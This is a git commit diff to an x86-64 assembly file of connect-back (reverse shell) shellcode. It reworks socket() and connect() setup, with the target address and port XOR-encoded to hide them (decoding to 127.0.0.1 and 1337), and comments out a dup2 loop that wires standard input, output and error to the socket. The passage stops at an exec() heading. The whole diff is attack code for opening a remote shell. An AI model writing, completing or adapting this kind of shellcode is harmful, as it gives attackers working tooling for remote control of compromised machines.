aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
-rw-r--r--shellcode/connect_x64.asm50
1 files changed, 24 insertions, 26 deletions
diff --git a/shellcode/connect_x64.asm b/shellcode/connect_x64.asm
index a8e2ffa..d1e0ef2 100644
--- a/shellcode/connect_x64.asm
+++ b/shellcode/connect_x64.asm
@@ -3,22 +3,20 @@ BITS 64
; socket()
xor rax,rax ; zero out rax (SYSCALL NMB)
-;xor rdi,rdi ; " " rdi (ARG0)
-;xor rsi,rsi ; " " rsi (ARG1)
-;xor rdx,rdx ; " " rdx (ARG2)
-mov rdx,rax
+xor rdi,rdi ; " " rdi (ARG0)
+xor rsi,rsi ; " " rsi (ARG1)
+mov rdx,rax ; " " rdx (ARG2)
mov byte al,41 ; socketcall syscall
-;mov byte dil,0x1 ; SOCKTYPE
-;mov byte sil,0x2 ; SOCKDOMAIN
-;mov byte dl,0x0 ; PROTOCOL
-mov rdi,0x1
-mov rsi,0x2
+mov byte dil,0x1 ; SOCKTYPE
+mov byte sil,0x2 ; SOCKDOMAIN
syscall
-; connect()
-mov al,42
mov rdi,rax
+
+; connect()
xor rax,rax
+push rax
+push rax
push 0x1011116E ; XOR-encoded -> 127.0.0.1
xor dword [rsp],0x11111111
push word 0x2814 ; push tcp port (XOR-encoded -> 1337)
@@ -26,24 +24,24 @@ xor word [rsp],0x1111 ; decode tcp port
push word 0x2 ; 0x2 -> AF_INET
mov rsi,rsp
mov dl,0x10
+mov al,42
syscall
; dup2()
-mov al,33
-mov rbx,rdi
-xor rdi,rdi
-xor rsi,rsi
-xor rcx,rcx ; zero out count register
-mov cl,0x3 ; loopcount
-dupes:
-xor eax,eax ; zero out eax
-mov al,33 ; dup2() syscall
-dec cl
-mov rdi,rcx
-mov rsi,rbx
-syscall
-inc cl
-loop dupes
+;mov rbx,rdi
+;xor rdi,rdi
+;xor rsi,rsi
+;xor rcx,rcx ; zero out count register
+;mov cl,0x3 ; loopcount
+;dupes:
+;xor eax,eax ; zero out eax
+;mov al,33 ; dup2() syscall
+;dec cl
+;mov rdi,rcx
+;mov rsi,rbx
+;syscall
+;inc cl
+;loop dupes
; exec()